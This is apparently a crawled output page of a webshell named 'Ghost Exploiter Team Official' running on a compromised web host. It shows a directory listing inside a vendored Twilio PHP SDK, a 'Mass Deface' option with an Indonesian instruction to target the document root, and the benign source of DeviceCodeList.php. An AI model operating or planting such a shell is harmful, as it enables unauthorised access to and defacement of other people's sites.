webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
twilio
/
sdk
/
src
/
Twilio
/
Rest
/
Oauth
/
V1
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
DeviceCodeInstance.php
2.135KB
edt
ren
DeviceCodeList.php
1.747KB
edt
ren
DeviceCodeOptions.php
1.391KB
edt
ren
DeviceCodePage.php
1.133KB
edt
ren
OauthContext.php
1.294KB
edt
ren
OauthInstance.php
2.468KB
edt
ren
OauthList.php
0.856KB
edt
ren
OauthPage.php
1.104KB
edt
ren
OpenidDiscoveryContext.php
1.398KB
edt
ren
OpenidDiscoveryInstance
...
3.991KB
edt
ren
OpenidDiscoveryList.php
0.915KB
edt
ren
OpenidDiscoveryPage.php
1.162KB
edt
ren
TokenInstance.php
2.123KB
edt
ren
TokenList.php
1.929KB
edt
ren
TokenOptions.php
4.026KB
edt
ren
TokenPage.php
1.104KB
edt
ren
UserInfoContext.php
1.32KB
edt
ren
UserInfoInstance.php
2.898KB
edt
ren
UserInfoList.php
0.874KB
edt
ren
UserInfoPage.php
1.121KB
edt
ren
<?php /** * This code was generated by * \ / _ _ _| _ _ * | (_)\/(_)(_|\/| |(/_ v1.0.0 * / / */ namespace Twilio\Rest\Oauth\V1; use Twilio\Exceptions\TwilioException; use Twilio\ListResource; use Twilio\Options; use Twilio\Serialize; use Twilio\Values; use Twilio\Version; class DeviceCodeList extends ListResource { /** * Construct the DeviceCodeList * * @param Version $version Version that contains the resource */ public function __construct(Version $version) { parent::__construct($version); // Path Solution $this->solution = []; $this->uri = '/device/code'; } /** * Create the DeviceCodeInstance * * @param string $clientSid A string that uniquely identifies this oauth app * @param string[] $scopes An Array of scopes * @param array|Options $options Optional Arguments * @return DeviceCodeInstance Created DeviceCodeInstance * @throws TwilioException When an HTTP error occurs. */ public function create(string $clientSid, array $scopes, array $options = []): DeviceCodeInstance { $options = new Values($options); $data = Values::of([ 'ClientSid' => $clientSid, 'Scopes' => Serialize::map($scopes, function($e) { return $e; }), 'Audiences' => Serialize::map($options['audiences'], function($e) { return $e; }), ]); $payload = $this->version->create('POST', $this->uri, [], $data); return new DeviceCodeInstance($this->version, $payload); } /** * Provide a friendly representation * * @return string Machine friendly representation */ public function __toString(): string { return '[Twilio.Oauth.V1.DeviceCodeList]'; } }